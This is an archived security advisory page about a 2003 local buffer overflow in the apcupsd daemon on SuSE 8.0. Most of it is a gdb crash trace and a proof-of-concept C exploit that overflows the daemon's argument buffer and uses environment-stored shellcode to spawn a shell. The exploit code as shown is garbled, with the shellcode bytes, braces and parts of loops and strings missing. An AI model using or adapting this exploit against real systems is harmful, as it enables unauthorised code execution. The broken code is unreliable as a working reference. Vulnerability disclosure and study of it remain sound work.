Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!

TUCoPS :: Linux :: Apps A-M :: a6082.htm

apcupsd local buffer overflow
21th Mar 2003 [SBWID-6082]

	apcupsd local buffer overflow


	tested with apcupsd delivered with Suse 8.0


	Thanks to Serkan Akpolat [] advisory :
	Apcupsd is a deamon for most APC's UPS for  Linux  There  is  no  bounds
	checking in the source code ,so  overflowing  the  buffer  is  possible.
	Apcupsd is by default not setuid root (SuSE  8.0)  A  proof  of  concept
	shell spawning exploit is attached to mail.
	milkshake:~ # apcupsd -f
	Segmentation fault (core dumped)
	milkshake:~ # gdb -q /sbin/apcupsd ./core
	(no debugging symbols found)...
	Core was generated by `apcupsd -f
	Program terminated with signal 11, Segmentation fault.
	Reading symbols from /lib/ debugging symbols
	[New Thread 1024 (LWP 1920)]
	Reading symbols from /lib/ debugging symbols found)...done.
	Loaded symbols for /lib/
	Reading symbols from /lib/ debugging symbols
	Loaded symbols for /lib/
	#0  0x40091a99 in vfprintf () from /lib/
	(gdb) bt
	#0  0x40091a99 in vfprintf () from /lib/
	#1  0x400a8a86 in vsprintf () from /lib/
	#2  0x08049b0c in strcpy ()
	#3  0x41414141 in ?? ()
	(gdb) q
	Exploit spawns a shell with the uid of the user ,who runs  the  exploit.
	Tested on SuSE 8.0
	milkshake:~ # cat eXapcupsd.c
	/* Proof of Concept Code for buffer overflow vulnerability in apcupsd--------*/
	/* This code has been tested in SuSE 8.0 -----------------------------------*/
	/* Apcupsd isn't by default setuid root in SuSE 8.0------------------------*/
	/* This code spawns a shell with the uid of the user, who runs the expolit*/
	/* Greetings to Avicenna , Hackpimp , Murat Balaban , team---*/
	/* Written by Serkan Akpolat --------------------------*/
	#include <stdio.h>
	#include <string.h>
	#include <unistd.h>
	#define BUFSIZE 500
	#define PADDING 3
	char sc[] =
	/* Murat Balaban execve /bin/sh shellcode                    */
	int main(void)
	char *env[3] = {sc, NULL};
	char buf[BUFSIZE];
	int i,j,ret;
	int *ap;
	for(j=0;j < PADDING;j++){
	ap = (int *)(buf + PADDING);
	ret = 0xbffffffa - strlen(sc) -strlen("/sbin/apcupsd");
	printf("Shellcode is on 0x%08x , %d junk bytes used for
	printf("\t\t<--PRESS ENTER-->");
	for (i = 0; i < BUFSIZE - 8; i += 4)
	*ap++ = ret;
	*ap++ ='\0';
	execle("/sbin/apcupsd", "apcupsd", "-f", buf, NULL, env);
	milkshake:~ # gcc eXapcupsd.c
	milkshake:~ # ./a.out
	Shellcode is on 0xbfffffc0 , 3 junk bytes used for alignment.
	apcupsd FATAL ERROR in apcconfig.c at line 833
	Error opening configuration file
	(AAA): ~^



TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2015 AOH